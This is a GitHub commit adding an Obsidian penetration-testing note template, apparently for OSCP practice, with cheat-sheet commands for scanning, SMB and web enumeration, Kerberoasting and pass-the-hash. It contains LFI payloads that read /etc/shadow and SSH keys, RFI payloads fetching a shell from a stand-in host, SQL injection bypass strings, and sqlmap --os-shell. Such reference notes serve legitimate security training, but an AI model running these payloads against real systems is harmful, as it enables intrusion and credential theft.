Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
200 changed files
with
7,579 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,2 @@ | ||
# Ignore Obsidian Files | ||
*.obsidian |
100 changes: 100 additions & 0 deletions
100
Pentest_Template_Master_1.0/Pentest Template Master 1.0/1. Recon/General Notes.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,100 @@ | ||
# "PCAP IT OR IT DIDNT HAPPEN...its up to you if you need to" | ||
|
||
|
||
## tcpdump: | ||
|
||
- tcpdump -i eth0 | ||
- tcpdump -c -i eth0 | ||
- tcpdump -A -i eth0 | ||
- tcpdump -w 0001.pcap -i eth0 | ||
- tcpdump -r 0001.pcap | ||
- tcpdump -n -i eth0 | ||
- tcpdump -i eth0 port 22 | ||
- tcpdump -i eth0 -src 172.21.10.X | ||
- tcpdump -i eth0 -dst 172.21.10.X | ||
|
||
Other tools: | ||
|
||
Tshark (Command Line Wireshark) | ||
Wireshark | ||
|
||
|
||
## Network Scanning | ||
|
||
NetDiscover (ARP Scanning): | ||
- netdiscover -i eth0 | ||
- netdiscover -r 172.21.10.0/24 | ||
|
||
Nmap: | ||
|
||
- nmap -sn 172.21.10.0/24 | ||
- nmap -sn 172.21.10.1-253 | ||
- nmap -sn 172.21.10.* | ||
|
||
Nbtscan: | ||
- nbtscan -r 172.21.1.0/24 | ||
|
||
Linux Ping Sweep (Bash) | ||
|
||
- for i in {1..254} ;do (ping -c 1 172.21.10.$i | grep "bytes from" &) ;done | ||
|
||
Windows Ping Sweep (Run on Windows System) | ||
|
||
- for /L %i in (1,1,255) do @ping -n 1 -w 200 172.21.10.%i > nul && echo 192.168.1.%i is up. | ||
|
||
|
||
|
||
## Host Scanning | ||
|
||
Nmap: | ||
|
||
- nmap -sC -sV 172.21.0.0 | ||
- nmap -sV -Pn 172.21.0.0 | ||
- nmap -T4 -sC -sV 172.21.0.0 | ||
- nmap -A 172.21.0.0 | ||
|
||
IPv6 Scan: | ||
|
||
Nmap Scripts: | ||
|
||
Location: /usr/share/nmap/scripts/ | ||
|
||
- nmap --scripts vuln,safe,discovery -oN results.txt target-ip | ||
|
||
Scans through Socks proxy: | ||
|
||
- nmap --proxies socks4://proxy-ip:8080 target-ip | ||
|
||
DNSRecon: | ||
|
||
- dnsrecon -d www.example.com -a | ||
- dnsrecon -d www.example.com -t axfr | ||
- dnsrecon -d <startIP-endIP> | ||
- dnsrecon -d www.example.com -D <namelist> -t brt | ||
|
||
Dig: | ||
|
||
- dig www.example.com + short | ||
- dig www.example.com MX | ||
- dig www.example.com NS | ||
- dig www.example.com> SOA | ||
- dig www.example.com ANY +noall +answer | ||
- dig -x www.example.com | ||
- dig -4 www.example.com (For IPv4) | ||
- dig -6 www.example.com (For IPv6) | ||
- dig www.example.com mx +noall +answer example.com ns +noall +answer | ||
- dig -t AXFR www.example.com | ||
|
||
Sublis3r: | ||
|
||
- Sublist3r -d www.example.com | ||
- Sublist3r -v -d www.example.com -p 80,443 | ||
|
||
OWASP AMASS: | ||
|
||
- amass enum -d www.example.com | ||
- amass intel -whois -d www.example.com | ||
- amass intel -active 172.21.0.0-64 -p 80,443,8080,8443 | ||
- amass intel -ipv4 -whois -d www.example.com | ||
- amass intel -ipv6 -whois -d www.example.com | ||
|
6 changes: 6 additions & 0 deletions
6
Pentest_Template_Master_1.0/Pentest Template Master 1.0/1. Recon/Target _1.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,6 @@ | ||
# Fill in results or other information about your target here: | ||
|
||
|
||
|
||
|
||
|
6 changes: 6 additions & 0 deletions
6
...Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/General Notes.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,6 @@ | ||
# When in Doubt...Always Enumerate! Enumeration is the key! | ||
|
||
|
||
|
||
## Resources | ||
- http://www.0daysecurity.com/penetration-testing/enumeration.html |
12 changes: 12 additions & 0 deletions
12
...Master_1.0/Pentest Template Master 1.0/2. Enumeration/Impacket General Notes.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,12 @@ | ||
## In Kali | ||
|
||
apt install impacket-scripts | ||
|
||
## Github | ||
|
||
https://github.com/SecureAuthCorp/impacket | ||
|
||
## Local Locations: | ||
|
||
/usr/share/doc/python3-impacket/examples | ||
|
24 changes: 24 additions & 0 deletions
24
...Master_1.0/Pentest Template Master 1.0/2. Enumeration/Impacket Kerberoasting.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,24 @@ | ||
## Check for Kerberoasting: | ||
|
||
- GetNPUsers.py DOMAIN-Target/ -usersfile user.txt -dc-ip <IP> -format hashcat/john | ||
|
||
## GetUserSPNs | ||
|
||
ASREPRoast: | ||
- impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file> | ||
- impacket-GetUserSPNs <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file> | ||
|
||
Kerberoasting: | ||
- impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file> | ||
|
||
Overpass The Hash/Pass The Key (PTK): | ||
- python3 getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash> | ||
- python3 getTGT.py <domain_name>/<user_name> -aesKey <aes_key> | ||
- python3 getTGT.py <domain_name>/<user_name>:[password] | ||
|
||
## Using TGT key to excute remote commands from the following impacket scripts: | ||
|
||
- python3 psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass | ||
- python3 smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass | ||
- python3 wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass | ||
|
23 changes: 23 additions & 0 deletions
23
...est_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Responder.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,23 @@ | ||
Cannot use in the OSCP Exam. Fun to use on assessments. | ||
Note: Multirelay.py does not work in python3 since the UserDict library has been depricated | ||
|
||
|
||
# Source: https://github.com/lgandx/Responder | ||
|
||
## Make changes to config to turn off services: | ||
|
||
nano /usr/share/responder/Responder.conf | ||
|
||
## Starting Responder: | ||
|
||
- responder -I [Interface] -A | ||
- responder -I [Interface] -i [IP Address] or -e [External IP] -A | ||
|
||
## Tools in Responder: | ||
|
||
Location: /usr/share/Responder/tools | ||
|
||
## Check for systems with SMB Signing not enabled | ||
|
||
- python3 RunFinger.py -i 172.21.0.0/24 | ||
|
102 changes: 102 additions & 0 deletions
102
...1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/General Notes.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,102 @@ | ||
|
||
## Step 1: ALWAYS LOOK AT THE SOURCE CODE OF THE WEBPAGE! | ||
|
||
|
||
## Web App Scanners | ||
|
||
Nikto: | ||
|
||
- nikto --url <domain> | ||
|
||
Wpscan: | ||
|
||
- wpscan --url <domain> | ||
- wpscan --url <domain> --enumerate ap at (All Plugins, All Themes) | ||
- wpscan --url <domain> --enumerate u (Usernames) | ||
- wpscan --url <domain> --enumerate v | ||
|
||
Web Tools for Directory Scanning: | ||
|
||
Dirb: | ||
|
||
- dirb <domain> | ||
- dirb <domain> <wordlist> | ||
|
||
Gobuster: | ||
|
||
- gobuster -u <url> -w /usr/share/wordlists/<Wordlist file> | ||
- gobuster -u <url> -w /usr/share/wordlists/<Wordlist file> -a Firefox (Custom Agent) | ||
- gobuster -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html | ||
- gobuster -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200" | ||
- gobuster -e -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200" | ||
- gobuster -v -e -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200" | ||
- gobuster -v -e -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200" -o output.txt | ||
- gobuster -s 200,204,301,302,307,403 -u 172.21.0.0 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' | ||
|
||
Wfuzz: | ||
|
||
- wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ | ||
- wfuzz -z range,0-10 --hl 97 http://testphp.vulnweb.com/listproducts.php?cat=FUZZ | ||
- wfuzz -z file,wordlist/others/common_pass.txt -d "uname=FUZZ&pass=FUZZ" --hc 302 http://testphp.vulnweb.com/userinfo.php (Post Requests) | ||
|
||
- wfuzz -z file,wordlist/general/common.txt -b cookie=value1 -b cookie2=value2 http://testphp.vulnweb.com/FUZZ (Fuzzing Cookies) | ||
|
||
Dirsearch: | ||
|
||
- dirsearch /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 172.21.0.0 -e php | ||
|
||
|
||
Other Tools: | ||
- Burp Suite | ||
- OWASP Zap | ||
- Cadaver | ||
- SQLMap | ||
- Joomscan | ||
|
||
|
||
## Testing for LFI: | ||
|
||
https://www.exploit-db.com/docs/english/40992-web-app-penetration-testing---local-file-inclusion-(lfi).pdf | ||
|
||
Examples: | ||
|
||
http://example.com/index.php?page=etc/passwd | ||
http://example.com/index.php?page=etc/passwd%00 | ||
http://example.com/index.php?page=../../etc/passwd | ||
http://example.com/index.php?page=%252e%252e%252f | ||
http://example.com/index.php?page=....//....//etc/passwd | ||
|
||
Interesting Files: | ||
|
||
Linux: | ||
/etc/passwd | ||
/etc/shadow | ||
/etc/issue | ||
/etc/group | ||
/etc/hostname | ||
/etc/ssh/ssh_config | ||
/etc/ssh/sshd_config | ||
/root/.ssh/id_rsa | ||
/root/.ssh/authorized_keys | ||
/home/user/.ssh/authorized_keys | ||
/home/user/.ssh/id_rsa | ||
|
||
Windows: | ||
|
||
Windows: | ||
/boot.ini | ||
/autoexec.bat | ||
/windows/system32/drivers/etc/hosts | ||
/windows/repair/SAM | ||
|
||
|
||
|
||
## Testing for RFI: | ||
|
||
http://example.com/index.php?page=http://callback.com/shell.txt | ||
http://example.com/index.php?page=http://callback.com/shell.txt%00 | ||
http://example.com/index.php?page=http:%252f%252fcallback.com%252fshell.txt | ||
|
||
## Resources | ||
|
||
- Turning LFI to RFI: https://l.avala.mp/?p=241 |
25 changes: 25 additions & 0 deletions
25
...1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/SQL Injection.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,25 @@ | ||
Testing for Bypasses: | ||
|
||
' or 1=1 LIMIT 1 -- | ||
' or 1=1 LIMIT 1 -- - | ||
' or 1=1 LIMIT 1# | ||
'or 1# | ||
' or 1=1 -- | ||
' or 1=1 -- - | ||
|
||
# SQLMAP | ||
|
||
## sqlmap crawl | ||
sqlmap -u http://172.21.0.0 --crawl=1 | ||
|
||
## sqlmap dump database | ||
sqlmap -u http://172.21.0.0 --dbms=mysql --dump | ||
|
||
## sqlmap shell | ||
sqlmap -u http://172.21.0.0 --dbms=mysql --os-shell | ||
|
||
# SQLI | ||
|
||
Testing for a row: | ||
|
||
- http://target-ip/inj.php?id=1 union all select 1,2,3,4,5,6,7,8 |
1 change: 1 addition & 0 deletions
1
...ter_1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/Target _1.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
# Fill in results or other information about your target here: |
63 changes: 63 additions & 0 deletions
63
...1.0/Pentest Template Master 1.0/2. Enumeration/Services/2. SMB/General Notes.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,63 @@ | ||
|
||
## Enumerate SMB: | ||
|
||
Enum4linux: | ||
|
||
- Enum4linux -a 172.21.0.0 | ||
|
||
SMBmap: | ||
|
||
- smbmap -H 172.21.0.0 -d [domain] -u [user] -p [password] | ||
- smbmap -H 172.21.0.0 -d [domain] -u "" -p "" | ||
|
||
Nmap: | ||
|
||
- nmap --script smb-* -p 139,445, 172.21.0.0 | ||
- nmap --script smb-enum-* -p 139,445, 172.21.0.0 | ||
|
||
/usr/share/nmap/scripts/smb-brute.nse | ||
/usr/share/nmap/scripts/smb-enum-domains.nse | ||
/usr/share/nmap/scripts/smb-enum-groups.nse | ||
/usr/share/nmap/scripts/smb-enum-processes.nse | ||
/usr/share/nmap/scripts/smb-enum-services.nse | ||
/usr/share/nmap/scripts/smb-enum-sessions.nse | ||
/usr/share/nmap/scripts/smb-enum-shares.nse | ||
/usr/share/nmap/scripts/smb-enum-users.nse | ||
/usr/share/nmap/scripts/smb-flood.nse | ||
/usr/share/nmap/scripts/smb-ls.nse | ||
/usr/share/nmap/scripts/smb-mbenum.nse | ||
/usr/share/nmap/scripts/smb-os-discovery.nse | ||
/usr/share/nmap/scripts/smb-print-text.nse | ||
/usr/share/nmap/scripts/smb-protocols.nse | ||
/usr/share/nmap/scripts/smb-psexec.nse | ||
/usr/share/nmap/scripts/smb-security-mode.nse | ||
/usr/share/nmap/scripts/smb-server-stats.nse | ||
/usr/share/nmap/scripts/smb-system-info.nse | ||
|
||
|
||
SMBClient: | ||
|
||
- smbclient -L 172.21.0.0 | ||
- smbclient //172.21.0.0/tmp | ||
|
||
Impacket SmbClient: | ||
|
||
- /usr/share/doc/python3-impacket/examples/smbclient.py username@172.21.0.0 | ||
|
||
RPCclient: | ||
|
||
- rpcclient -U "" -N 172.21.0.0 enumdomusers | ||
|
||
Impacket: | ||
|
||
- python3 samdump.py SMB 172.21.0.0 | ||
|
||
CrackMapExec: | ||
|
||
- crackmapexec smb -L | ||
- crackmapexec 172.21.0.0 -u Administrator -H [hash] --local-auth | ||
- crackmapexec 172.21.0.0 -u Administrator -H [hash] --share | ||
- crackmapexec smb 172.21.0.0/24 -u user -p 'Password' --local-auth -M mimikatz | ||
|
||
|
||
|
1 change: 1 addition & 0 deletions
1
...ter_1.0/Pentest Template Master 1.0/2. Enumeration/Services/2. SMB/Target _1.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
# Fill in results or other information about your target here: |
Oops, something went wrong.